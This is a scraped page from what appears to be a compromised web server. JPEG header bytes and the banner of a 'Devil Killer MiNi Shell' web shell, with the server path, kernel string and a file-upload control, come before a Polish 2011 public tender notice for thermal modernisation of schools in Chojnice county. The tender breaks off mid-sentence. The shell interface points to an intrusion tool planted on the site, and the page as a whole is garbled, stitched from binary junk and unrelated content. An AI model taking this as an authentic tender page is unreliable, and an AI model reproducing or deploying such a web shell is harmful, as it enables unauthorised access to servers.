JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110405/66006-N-2011.html

<p class="kh_header"><b>Chojnice: Termomodernizacja budynków użyteczności publicznej w powiecie chojnickim - I etap</b><br>
<b>Numer ogłoszenia: 66006 - 2011; data zamieszczenia: 05.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Chojnicki , ul. 31 Stycznia 56, 89-600 Chojnice, woj. pomorskie, tel. 052 3966533.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.chojnice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynków użyteczności publicznej w powiecie chojnickim - I etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest wykonanie robót budowlanych w trzech częściach: Część I Termomodernizacja budynku Zespołu Szkół Ponadgimnazjalnych w Brusach Zakres robót: 1. Izolacja ścian fundamentowych a. izolacja pionowa z papy zgrzewalnej podkładowej na pow. 105,82 m2 b. izolacja cieplna - płyty styropianowe ekstrudowane gr. 10,0 cm na pow. 105,82 m2 2. Izolacja ścian nadziemia a. przygotowanie podłoża b. ocieplenie ścian płytami styropianowymi FS 20 gr. 13 cm na pow. 809,57 m2 c. warstwa siatki z włókna szklanego d. wyprawa elewacyjna cienkowarstwowa z tynku silikatowego e. malowanie tynków zewnętrznych farbą silikonową f. obróbki blacharskie z blachy powlekanej gr. 0,55 mm 3. Cokół a. rozebranie okładziny ściennej z płytek, b. gruntowanie podłoża c. ocieplenie z płyt styropianowych FS 20 gr 10 cm na pow. 88,51 m2 d. warstwa siatki z włókna szklanego e. wyprawa elewacyjna cienkowarstwowa z tynku silikatowego f. malowanie tynków zewnętrznych farbą silikonową g. obróbki blacharskie z blachy powlekanej gr. 0,55 mm 4. Dach a. przygotowanie podłoża b. izolacja cieplna z styropapy (styropian FS 20) grubości 15 cm oklejonej dwustronnie papą c. pokrycie z papy termozgrzewalnej nawierzchniowej gr. 5,2 mm na pow. 646,27 m2 5. Wymiana drzwi stalowych na drzwi aluminiowe przeszklone o pow. 8,55 m2 a. demontaż istniejącej zabudowy stalowej, b. wykonanie ścian z gazobetonu odmiany 700 o grubości 24 cm. Nadproża żelbetowe, c.izolacja termiczna ścian przy zastosowaniu styropianu FS 20 gr. 12 cm. Wyprawa elewacyjna silikatowa oraz malowanie farbą silikatową, d. montaż drzwi aluminiowych zewnętrznych szt. 2 oraz wewnętrznych szt. 2 6. Montaż zaworów termostatycznych szt. 90 wraz z regulacją instalacji c.o. Część II Termomodernizacja budynku Zespołu Szkół w Chojnicach Zakres robót: 1. Izolacja termiczna ścian a) cokół przygotowanie podłoża, 2 x papa termozgrzewalna izolacyjna, styropian hydromax grubości 12 cm na pow. 218,39 m2 na zaprawie klejowej + kołki montażowe, 2 x siatka z włókna szklanego zatopiona w zaprawie, tynk cokołowy b) ściana zewnętrzne powyżej cokołu przygotowanie podłoża, styropian FS 15 grubości 12 cm na pow. 1708,92 m2 na zaprawie klejowej + kołki montażowe, 2 x siatka z włókna szklanego zatopiona w zaprawie,tynk mineralny, farba silikatowa 2. Docieplenie dachu przygotowanie podłoża, izolacja cieplna z styropapy (styropian FS 20) grubości 15 cm oklejonej dwustronnie papą, pokrycie z papy termozgrzewalnej nawierzchniowej gr. 5,2 mm na pow. 646,27 m2, obróbki blacharskie z blachy tytanowo-cynkowej gr. 0,55 mm 3. Wymiana stolarki okiennej i drzwiowej Okna z PCV w kolorze białym o okuciach wzmocnionych. Okna z rozszczelnieniem ręcznym. Do szklenia stosować wysokiej jakość szyby typu float. Zestawy szybowe z dwiema szybami w grubościach od 24-33 mm i właściwości termoizolacyjne: współczynnik przenikania ciepła k-1,1 W/m2 K. Okna powinny być wyposażone w okucia obwiedniowe, wzmocnione. Drzwi zewnętrzne z drewna klejonego, płycinowe odtworzone wg istniejących. Współczynnik przenikania ciepła 1,6 W/m2 K. Ilości okien i drzwi oraz ich kształt i podział zgodnie z zestawieniem stolarki. Uwaga Przed wykonaniem stolarki należy sprawdzić wymiary z natury 4. Wymiana rynien i rur spustowych oraz obróbki blacharskiej Rynny o 18 cm, rury spustowe o 15 cm. Dla rynien i rur spustowych oraz obróbek blacharskich zastosować blachę tytanowo - cynkową gr. 0,55 mm Część III Termomodernizacja budynku - wymiana stolarki w Centrum Kształcenia Ustawicznego w Chojnicach Wymiana stolarki okiennej w zakresie: ON 6 10 szt. ON 7 5 szt. ON 8 10 szt OS 6 2 szt. OS 20 5 szt. wraz z parapetami zewnętrznymi Okna z PCV w kolorze białym o okuciach wzmocnionych. Okna z rozszczelnieniem ręcznym. Do szklenia stosować wysokiej jakość szyby typu float. Zestawy szybowe z dwiema szybami w grubościach od 24-33 mm i właściwości termoizolacyjne: współczynnik przenikania ciepła k-1,1 W/m2K. Okna powinny być wyposażone w okucia obwiedniowe, wzmocnione. Wymiar stolarki drzwiowej: DN 1 1 szt. Materiał aluminium w kolorze brązowym. Przeszklenie w połowie węższego skrzydła. Dwa zamki. Uwaga Przed wykonaniem stolarki należy sprawdzić wymiary z natury Przedmiot zamówienia określa (dla każdej z części): dokumentacja projektowa, przedmiar robót, specyfikacja techniczna wykonania i odbioru robót budowlanych (STWiORB). Podstawą sporządzenia kosztorysu ofertowego jest projekt budowlany i specyfikacja techniczna wykonania i odbioru robót. Natomiast przedmiar robót stanowi opracowanie wtórne w stosunku do wyżej wymienionej dokumentacji i obrazuje on skalę zamierzenia budowlanego i ułatwia Wykonawcom oszacowanie kosztów realizacji inwestycji. Dlatego nie przypisuje się przedmiarowi decydującego znaczenia z punktu widzenia sposobu obliczenia ceny ofertowej. Zapis ten należy odnieść również do art.632 $ 1 kc. Jeżeli strony umówiły się o wynagrodzenie ryczałtowe, przyjmujący zamówienie nie może żądać podwyższenia wynagrodzenia, chociażby w czasie zawarcia umowy nie można było przewidzieć rozmiaru lub kosztów prac. 2) Przed złożeniem oferty Wykonawca winien dokonać wizji terenu budowy oraz jego otoczenia w celu oceny, na własną odpowiedzialność, kosztów i ryzyka wszystkich czynników koniecznych do przygotowania jego rzetelnej oferty, obejmującej wszelkie niezbędne prace przygotowawcze, zasadnicze i towarzyszące zarówno do prowadzenia robót budowlano - montażowych jak i rozbiórkowych. W tym celu Wykonawca zgłosi Zamawiającemu zamiar wizji terenu budowy, co najmniej z 2. dniowym wyprzedzeniem, pod nr tel. 052 39 66 534 (p. Jan Gierszewski). 3) Do wykonania robót mogą być użyte wyłącznie materiały i urządzenia odpowiadające wymogom dokumentacji projektowej oraz: a) oznaczone znakiem CE, dla których dokonano oceny zgodnie ze zharmonizowaną normą europejską wprowadzoną do Zbioru Polskich Norm, z europejską aprobatą techniczną EAT lub krajową specyfikacja techniczną państw członkowskich UE uznaną przez Komisję Europejską za zgodną z wymaganiami podstawowymi, b) znajdujące się w określonym przez Komisje Europejską wykazie wyrobów mających niewielkie znaczenie dla zdrowia i bezpieczeństwa, c) dla których producenci wystawili deklarację zgodności WE potwierdzającą zgodność wyrobów z europejskimi normami i aprobatami, d) oznaczone znakiem budowlanym zgodnie z Polską Normą lub krajową aprobatą techniczną , a zgodność ta została potwierdzona w deklaracji zgodności wydanej przez producenta lub wyroby przeznaczone do jednostkowego stosowania w konkretnym obiekcie budowlanym zabytkowym. 4) inne ustalenia 1. Szczegółowy opis przedmiotu zamówienia zawarty jest w przedmiarach robót, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz w dokumentacji projektowej. 2. Zobowiązuje się wykonawcę do sprawdzenia zgodności projektu budowlanego z przedmiarem robót i do zapoznania się z terenem budowy. 3. O ile w dokumentacji technicznej, przedmiarach robót, STWiORB lub innych dokumentach podano nazwę producenta, nazwę, tym lub symbol konkretnego wyrobu - podane rozwiązania należy traktować jako przykładowe. Zamawiający dopuszcza użycie innych równoważnych materiałów, technologii i urządzeń niż wskazane w dokumentacji projektowej jeżeli ich opisanie w dokumentacji nastąpiło poprzez wskazanie znaków towarowych, patentów lub pochodzenia), lecz muszą one spełniać wszystkie normy oraz być o parametrach nie gorszych od wskazanych w dokumentacji projektowej, za zgodą projektanta, Inspektora nadzoru i pod warunkiem złożenia stosownych dokumentów, uwiarygodniających te materiały i urządzenia w celu aprobaty Zamawiającego. Wykonawca jest zobowiązany przedłożyć inspektorowi nadzoru odpowiednie atesty, certyfikaty, gwarancje, aprobaty techniczne dotyczące zastosowanych materiałów i urządzeń, przed ich zastosowaniem. 4. W.w roboty budowlane należy wykonać z zachowaniem szczególnej staranności, zgodnie ze sztuką budowlaną, technologią systemową, zaleceniami nadzoru inwestorskiego i autorskiego oraz zgodnie z : A. umową, B. dokumentacją projektową, C. specyfikacją techniczną wykonania i odbioru robót, D. przedmiarami robót, E. Polskimi Normami Budowlanymi, F. Specyfikacją Istotnych Warunków Zamówienia. 5. Komplet materiałów niezbędnych do wykonania zamówienia wykonawca dostarczy na plac budowy we własnym zakresie. 6. Przy wykonywaniu robót WYKONAWCA zobowiązuje się stosować wyroby budowlane i urządzenia o właściwościach użytkowych umożliwiających prawidłowo zaprojektowanym i wykonanym obiektom budowlanym spełnienie wymagań podstawowych, określonych w art. 5 ust. 1 pkt 1 - dopuszczone do obrotu i powszechnego lub jednostkowego stosowania w budownictwie zgodnie z art. 10 ustawy z dnia 7 lipca 1994 roku Prawo budowlane (j. t. Dz. U. z 2006 r. Nr 156, poz. 1118 ze zm. ) wraz z obowiązującymi zarządzeniami i rozporządzeniami. 7. Wszystkie materiały i urządzenia użyte do wykonania zamówienia muszą posiadać aktualne świadectwa, aprobaty lub certyfikaty dopuszczające do stosowania w budownictwie na terenie RP. Odpowiednie atesty, certyfikaty, gwarancje i aprobaty techniczne dotyczące zastosowanych materiałów i urządzeń należy przedłożyć inspektorowi nadzoru przed ich zastosowaniem. 8. Podczas realizacji robót wymagane jest przestrzeganie przez Wykonawcę przepisów bezpieczeństwa i higieny pracy oraz zabezpieczenie przed dostępem osób postronnych terenu budowy oraz przechowywanych materiałów budowlanych. 9. Oferta oraz Kosztorys Ofertowy muszą uwzględniać wszystkie koszty związane z prawidłową realizacją zamówienia. 10. Wykonawca udzieli Zamawiającemu gwarancji i rękojmi na wykonane roboty budowlane w wymiarze 5 lat, licząc od dnia ich odbioru.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, że przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp - do 50 % wartości zamówienia, na zasadach określonych w przedmiotowym artykule.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.42.20-8, 45.26.12.10-9, 45.26.13.20-3, 45.32.00.00-6, 45.42.11.31-1, 45.42.11.32-8, 45.44.21.10-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.08.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w wysokości: Część I 10.000,00 PLN Słownie: dziesięć tysięcy złotych. Część II20.000,00 PLN Słownie: dwadzieścia tysięcy złotych. Część III 1.000,00 PLN Słownie: jeden tysiąc złotych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalności prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I: co najmniej jedną robotę budowlaną polegającą na termomodernizacji budynku o wartości minimum 320.000 zł brutto, - Część II: co najmniej jedną robotę budowlaną polegającą na termomodernizacji budynku o wartości minimum 650.000 zł brutto, - Część III: co najmniej jedną robotę budowlaną polegającą na wymianie stolarki okiennej lub drzwiowej o wartości minimum 30.000 zł brutto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują lub będą dysponowali osobami w celu obsadzenia stanowisk: cz. I 1. Funkcja / Stanowisko, Uprawnienia: Kierownik budowy - posiadanie ważnych uprawnień budowlanych w zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej - bez ograniczeń; Minimalne doświadczenie zawodowe: 5 lat doświadczenie całkowite, 5 lat pracy w branży budowlanej,3 lata pracy na stanowisku kierownika robót/budowy; Osoby: minimum jedna. 2. Funkcja / Stanowisko, Uprawnienia: Kierownik robót - posiadanie ważnych uprawnień w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych; Minimalne doświadczenie zawodowe: jw.; Osoby: minimum jedna. cz. II 1. Funkcja / Stanowisko, Uprawnienia: Kierownik budowy - posiadanie ważnych uprawnień budowlanych w zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej - bez ograniczeń; Minimalne doświadczenie zawodowe: 5 lat doświadczenie całkowite, 5 lat pracy w branży budowlanej,3 lata pracy na stanowisku kierownika robót/budowy; Osoby: minimum jedna. cz. III 1. Funkcja / Stanowisko, Uprawnienia: Kierownik budowy - posiadanie ważnych uprawnień budowlanych w zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej - bez ograniczeń; Minimalne doświadczenie zawodowe: 5 lat doświadczenie całkowite, 5 lat pracy w branży budowlanej, 3 lata pracy na stanowisku kierownika robót/budowy; Osoby: minimum jedna</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej część I - suma ubezpieczenia nie może być niższa niż 320.000,00 zł. część II - suma ubezpieczenia nie może być niższa niż 650.000,00 zł. część III - suma ubezpieczenia nie może być niższa niż 30.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony formularz ofertowy - druk OFERTA- wg załącznika nr 1 do siwz. 2) Pełnomocnictwo dla osoby podpisującej ofertę do występowania w imieniu wykonawcy, jeżeli nie wynika to bezpośrednio z dokumentów rejestrowych lub w przypadku o którym mowa w art. 23 ust. 2 ustawy Prawo zamówień publicznych - wg załącznika nr 8 do siwz. 3) Wykaz części zamówienia jakie wykonawca zamierza powierzyć podwykonawcom - wg wzoru określonego w załączniku Nr 9. 4) Harmonogram rzeczowo - finansowy. 5) Kosztorys ofertowy. 6) Pisemne zobowiązanie innych podmiotów, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, wymagane w przypadku gdy Wykonawca polega na ich zasobach na zasadach określonych w art. 26 ust. 2b</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dla potrzeb Umowy, Siła Wyższa oznacza zdarzenie, którego wystąpienie jest niezależne od Stron i któremu nie mogą one zapobiec przy zachowaniu należytej staranności, a w szczególności: wojny, stany nadzwyczajne, klęski żywiołowe, epidemie, ograniczenia związane z kwarantanną, embargo, rewolucje, zamieszki i strajki. 4. Zamawiający przewiduje wprowadzenie korzystnych dla zamawiającego zmian w treści umowy w przypadku: 1) konieczności udzielenia zamówienia dodatkowego, nieobjętego zamówieniem podstawowym, którego wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, jeżeli: a) z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od zamówienia podstawowego wymagałoby podniesienia niewspółmiernie wysokich kosztów, b) prawidłowe wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego. Zamawiający wyjaśnia, że zgodnie z obowiązującymi przepisami za roboty dodatkowe uznaje się wyłącznie te roboty, które nie zostały ujęte w dokumentacji projektowej, których nie można było przewidzieć w chwili zawarcia umowy, a są niezbędne do prawidłowego wykonania przedmiotu umowy. 2) wystąpienia okoliczności niezależnych od wykonawcy skutkujących niemożliwością dotrzymania terminu realizacji przedmiotu umowy, 3) aktualizacji rozwiązań ze względu na postęp technologiczny (np. wycofanie z obrotu materiałów lub urządzeń); 4) zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego; 5) wyjątkowo niesprzyjające warunki atmosferyczne uniemożliwiające wykonanie robót zgodnie z zasadami współczesnej wiedzy technicznej i obowiązujących przepisów 6) konieczność wykonania prac archeologicznych na terenie budowy; 7) wystąpienie siły wyższej; 8) nie przekazania przez zamawiającego placu budowy w terminie kreślonym w umowie; 9) niezawinionego przez wykonawcę ograniczenia dostępności placu budowy w czasie realizacji robót; 10) wstrzymania przez zamawiającego wykonania robót nie wynikających z okoliczności leżących po stronie wykonawcy. (Nie dotyczy okoliczności wstrzymania robót przez inspektorów nadzoru zamawiającego w przypadku stwierdzenia nieprawidłowości zawinionych przez wykonawcę), 11) zmiany zasad lub warunków finansowania inwestycji, 12) konieczności wykonania przez zamawiającego korekty projektu dla usunięcia wad dostarczonej dokumentacji. W przypadku zmiany terminu realizacji przedmiotu umowy, wymienionych w pkt 1-12, termin ten może ulec przedłużeniu nie dłużej jednak niż o czas trwania tych okoliczności. 5. Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie zmian ceny ryczałtowej brutto: w przypadku zmiany stawki podatku VAT dla robót objętych przedmiotem zamówienia w trakcie realizacji przedmiotu zamówienia strony 